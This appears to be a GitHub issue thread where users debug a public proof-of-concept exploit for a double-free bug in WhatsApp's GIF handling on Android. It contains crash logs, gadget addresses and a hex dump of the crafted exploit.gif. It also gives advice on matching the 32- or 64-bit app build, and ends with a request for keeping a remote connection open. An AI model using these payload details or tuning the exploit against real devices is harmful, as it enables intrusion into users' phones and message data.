Whatsapp crashed

[Ychiel]

Hi,
I have android 9 with Whatsapp 2.19.203.
I found the gadget and the system with your android apk that you publish.
When I'm enter the Whatsapp gallery after I sent the gif file as document the app was crashed.

Do You have any idea why?
Logs:

12-09 14:08:28.563 27111 27111 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
12-09 14:08:28.563 27111 27111 F DEBUG : Build fingerprint: 'samsung/beyond1ltexx/beyond1:9/PPR1.180610.011/G973FXXS3ASJG:user/release-keys'
12-09 14:08:28.564 27111 27111 F DEBUG : Revision: '26'
12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm'
12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<<
12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated'
12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c
12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG :
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
12-09 14:08:28.755 27111 27111 F DEBUG : #1 pc 0007e5f9 /system/lib/libc.so (ifree+880)
12-09 14:08:28.756 27111 27111 F DEBUG : #2 pc 0007e717 /system/lib/libc.so (je_free+70)
12-09 14:08:28.756 27111 27111 F DEBUG : #3 pc 0035aa7f /system/lib/libhwui.so (SkDeque::~SkDeque()+30)
12-09 14:08:28.756 27111 27111 F DEBUG : #4 pc 00382f05 /system/lib/libhwui.so (SkBitmapDevice::~SkBitmapDevice()+16)
12-09 14:08:28.756 27111 27111 F DEBUG : #5 pc 0035684f /system/lib/libhwui.so (SkCanvas::internalRestore()+538)
12-09 14:08:28.756 27111 27111 F DEBUG : #6 pc 00358a6d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+28)
12-09 14:08:28.756 27111 27111 F DEBUG : #7 pc 000d732d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #8 pc 00380b1d /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+92)
12-09 14:08:28.756 27111 27111 F DEBUG : #9 pc 000d3363 /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #10 pc 000794a9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.math.NativeBN.BN_copy [DEDUPED]+120)
12-09 14:08:28.756 27111 27111 F DEBUG : #11 pc 0010ddff /system/framework/arm/boot-core-libart.oat (offset 0x77000) (libcore.util.NativeAllocationRegistry$CleanerThunk.run+86)
12-09 14:08:28.756 27111 27111 F DEBUG : #12 pc 0030af63 /system/framework/arm/boot.oat (offset 0x10d000) (sun.misc.Cleaner.clean+90)
12-09 14:08:28.756 27111 27111 F DEBUG : #13 pc 0016ea31 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueueLocked+168)
12-09 14:08:28.756 27111 27111 F DEBUG : #14 pc 0016eb1d /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueuePending+148)
12-09 14:08:28.756 27111 27111 F DEBUG : #15 pc 0014bcb9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$ReferenceQueueDaemon.runInternal+232)
12-09 14:08:28.756 27111 27111 F DEBUG : #16 pc 000ef64b /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$Daemon.run+66)
12-09 14:08:28.756 27111 27111 F DEBUG : #17 pc 00219669 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.Thread.run+64)
12-09 14:08:28.756 27111 27111 F DEBUG : #18 pc 00411375 /system/lib/libart.so (art_quick_invoke_stub_internal+68)
12-09 14:08:28.756 27111 27111 F DEBUG : #19 pc 003ea469 /system/lib/libart.so (art_quick_invoke_stub+224)
12-09 14:08:28.756 27111 27111 F DEBUG : #20 pc 000a1615 /system/lib/libart.so (art::ArtMethod::Invoke(art::Thread*, unsigned int*, unsigned int, art::JValue*, char const*)+136)
12-09 14:08:28.756 27111 27111 F DEBUG : #21 pc 0034b0b5 /system/lib/libart.so (art::(anonymous namespace)::InvokeWithArgArray(art::ScopedObjectAccessAlreadyRunnable const&, art::ArtMethod*, art::(anonymous namespace)::ArgArray*, art::JValue*, char const*)+52)
12-09 14:08:28.756 27111 27111 F DEBUG : #22 pc 0034be0d /system/lib/libart.so (art::InvokeVirtualOrInterfaceWithJValues(art::ScopedObjectAccessAlreadyRunnable const&, _jobject*, _jmethodID*, jvalue*)+320)
12-09 14:08:28.756 27111 27111 F DEBUG : #23 pc 0036d1f3 /system/lib/libart.so (art::Thread::CreateCallback(void*)+866)
12-09 14:08:28.756 27111 27111 F DEBUG : #24 pc 00064939 /system/lib/libc.so (__pthread_start(void*)+140)
12-09 14:08:28.757 27111 27111 F DEBUG : #25 pc 0001e3c5 /system/lib/libc.so (__start_thread+24)

[awakened1712]

The apk generates gif files that trigger writing test.txt to /sdcard

Probably it succeeded, you can check the sdcard to see if test.txt is there

[Ychiel]

There is no test.txt file.
I see just exploit.gif file...

[awakened1712]

From the log, apparently the exploit was able to hit the gadget found in libhwui.so. Check if WhatsApp has write to sdcard permission.

[Ychiel]

Yes,
WhatsApp have full permissions (Camera,Contacts, location,Microphone,Phone,SMS and Storage)
What else?

[jpclaudino]

Hi,
I have android 9 with Whatsapp 2.19.203.
I found the gadget and the system with your android apk that you publish.
When I'm enter the Whatsapp gallery after I sent the gif file as document the app was crashed.

Do You have any idea why?
Logs:

12-09 14:08:28.563 27111 27111 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
12-09 14:08:28.563 27111 27111 F DEBUG : Build fingerprint: 'samsung/beyond1ltexx/beyond1:9/PPR1.180610.011/G973FXXS3ASJG:user/release-keys'
12-09 14:08:28.564 27111 27111 F DEBUG : Revision: '26'
12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm'
12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<<
12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated'
12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c
12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG :
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
12-09 14:08:28.755 27111 27111 F DEBUG : #1 pc 0007e5f9 /system/lib/libc.so (ifree+880)
12-09 14:08:28.756 27111 27111 F DEBUG : #2 pc 0007e717 /system/lib/libc.so (je_free+70)
12-09 14:08:28.756 27111 27111 F DEBUG : #3 pc 0035aa7f /system/lib/libhwui.so (SkDeque::~SkDeque()+30)
12-09 14:08:28.756 27111 27111 F DEBUG : #4 pc 00382f05 /system/lib/libhwui.so (SkBitmapDevice::~SkBitmapDevice()+16)
12-09 14:08:28.756 27111 27111 F DEBUG : #5 pc 0035684f /system/lib/libhwui.so (SkCanvas::internalRestore()+538)
12-09 14:08:28.756 27111 27111 F DEBUG : #6 pc 00358a6d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+28)
12-09 14:08:28.756 27111 27111 F DEBUG : #7 pc 000d732d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #8 pc 00380b1d /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+92)
12-09 14:08:28.756 27111 27111 F DEBUG : #9 pc 000d3363 /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #10 pc 000794a9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.math.NativeBN.BN_copy [DEDUPED]+120)
12-09 14:08:28.756 27111 27111 F DEBUG : #11 pc 0010ddff /system/framework/arm/boot-core-libart.oat (offset 0x77000) (libcore.util.NativeAllocationRegistry$CleanerThunk.run+86)
12-09 14:08:28.756 27111 27111 F DEBUG : #12 pc 0030af63 /system/framework/arm/boot.oat (offset 0x10d000) (sun.misc.Cleaner.clean+90)
12-09 14:08:28.756 27111 27111 F DEBUG : #13 pc 0016ea31 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueueLocked+168)
12-09 14:08:28.756 27111 27111 F DEBUG : #14 pc 0016eb1d /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueuePending+148)
12-09 14:08:28.756 27111 27111 F DEBUG : #15 pc 0014bcb9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$ReferenceQueueDaemon.runInternal+232)
12-09 14:08:28.756 27111 27111 F DEBUG : #16 pc 000ef64b /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$Daemon.run+66)
12-09 14:08:28.756 27111 27111 F DEBUG : #17 pc 00219669 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.Thread.run+64)
12-09 14:08:28.756 27111 27111 F DEBUG : #18 pc 00411375 /system/lib/libart.so (art_quick_invoke_stub_internal+68)
12-09 14:08:28.756 27111 27111 F DEBUG : #19 pc 003ea469 /system/lib/libart.so (art_quick_invoke_stub+224)
12-09 14:08:28.756 27111 27111 F DEBUG : #20 pc 000a1615 /system/lib/libart.so (art::ArtMethod::Invoke(art::Thread*, unsigned int*, unsigned int, art::JValue*, char const*)+136)
12-09 14:08:28.756 27111 27111 F DEBUG : #21 pc 0034b0b5 /system/lib/libart.so (art::(anonymous namespace)::InvokeWithArgArray(art::ScopedObjectAccessAlreadyRunnable const&, art::ArtMethod*, art::(anonymous namespace)::ArgArray*, art::JValue*, char const*)+52)
12-09 14:08:28.756 27111 27111 F DEBUG : #22 pc 0034be0d /system/lib/libart.so (art::InvokeVirtualOrInterfaceWithJValues(art::ScopedObjectAccessAlreadyRunnable const&, _jobject*, _jmethodID*, jvalue*)+320)
12-09 14:08:28.756 27111 27111 F DEBUG : #23 pc 0036d1f3 /system/lib/libart.so (art::Thread::CreateCallback(void*)+866)
12-09 14:08:28.756 27111 27111 F DEBUG : #24 pc 00064939 /system/lib/libc.so (__pthread_start(void*)+140)
12-09 14:08:28.757 27111 27111 F DEBUG : #25 pc 0001e3c5 /system/lib/libc.so (__start_thread+24)

Are you sure you found the system and gadget location?
By the log, the Android is 32 bits.
The double free occurs normally. But the gadget should not be found. The register and the adresses are different.

[Ychiel]

I used your APK to find the values for the System and Gadget.
Attached the logcat from the APK:
2-17 20:58:41.032 14168 14168 D InputTransport: Input channel destroyed: fd=72
12-17 20:58:43.222 14168 14168 D ViewRootImpl@fe417cb[MainActivity]: ViewPostIme pointer 0
12-17 20:58:43.292 14168 14168 D ViewRootImpl@fe417cb[MainActivity]: ViewPostIme pointer 1
12-17 20:58:43.467 14168 14168 E libgif : gadget = 68 0E 40 F9 60 82 00 91 00 01 3F D6 size = 12 found in
12-17 20:58:43.467 14168 14168 E libgif : 731b3cb000-731bb79000 r-xp 00000000 fd:00 3812 /system/lib64/libhwui.so
12-17 20:58:43.467 14168 14168 E libgif : g1_loc = 0x731b4c3444
12-17 20:58:43.467 14168 14168 E libgif : system_loc = 0x731cab3e08
12-17 20:58:43.467 14168 14168 E libgif : == genLine_0 complete ==
12-17 20:58:43.468 14168 14168 E libgif : buffer = 0x7fe0b318b0 size = 266
12-17 20:58:43.468 14168 14168 E libgif : 47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
12-17 20:58:43.468 14168 14168 E libgif : FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
12-17 20:58:43.468 14168 14168 E libgif : 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 08 7C AC E2
12-17 20:58:43.468 14168 14168 E libgif : 30 07 00 00 00 74 DE D4 19 83 06 C4 8B 39 64 C6
12-17 20:58:43.468 14168 14168 E libgif : 84 91 43 E6 05 9D 32 73 E8 B8 A0 83 87 0E 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 44 68 30 D9 30 07 00 00 00 EE FF FF 2C 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
12-17 20:58:43.468 14168 14168 E libgif : 18 00 0A 00 0F 00 01 00 00 3B
12-17 20:58:43.501 14168 14182 I ExternalStorage: Scanned /storage/emulated/0/exploit.gif -> uri = content://media/external/images/media/96

Is that the right results?

[jpclaudino]

Try the following command:
adb shell
getprop | grep eabi

if you see something like this, you´re on a 32-bit architecture.

ro.product.cpu.abi]: [armeabi-v7a]
ro.product.cpu.abi2]: [armeabi]
ro.product.cpu.abilist]: [armeabi-v7a,armeabi]
ro.product.cpu.abilist32]: [armeabi-v7a,armeabi]
ro.vendor.product.cpu.abilist]: [armeabi-v7a,armeabi]
ro.vendor.product.cpu.abilist32]: [armeabi-v7a,armeabi]

[Ychiel]

This is the result:
beyond1:/ $ getprop | grep eabi
[ro.product.cpu.abilist]: [arm64-v8a,armeabi-v7a,armeabi]
[ro.product.cpu.abilist32]: [armeabi-v7a,armeabi]
[ro.vendor.product.cpu.abilist]: [arm64-v8a,armeabi-v7a,armeabi]
[ro.vendor.product.cpu.abilist32]: [armeabi-v7a,armeabi]

[jpclaudino]

64-bit architecture. Strange, it may be the version of WhatsApp installed.

These registers and library calls indicate 32-bit libs usage.
.
12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c
12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG :
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)

[Ychiel]

I think that the hardware is 64bit but the android OS is 32 bit.

[awakened1712]

I see, you probably got the 32-bit WhatsApp running on the 64-bit Android device. Then you you probably wanna go to apkmirror to find the arm64 version.

I suggest this https://www.apkmirror.com/apk/whatsapp-inc/whatsapp/whatsapp-2-19-216-release/whatsapp-messenger-2-19-216-3-android-apk-download/

[Ychiel]

Thanks, now it's working...
But the connection to the remote server closed immediately.
How can i keep the connection open?

[awakened1712]

Nice. Why do you need to keep it open? I don't mind sharing but I'm afraid script kiddies will misuse it to do hacking in real life.

[Ychiel]

I want to create a demo and show access to whatsapp data.
To explain to our employees that the information in Whatsapp can leak even that communication between devices is encrypted.
??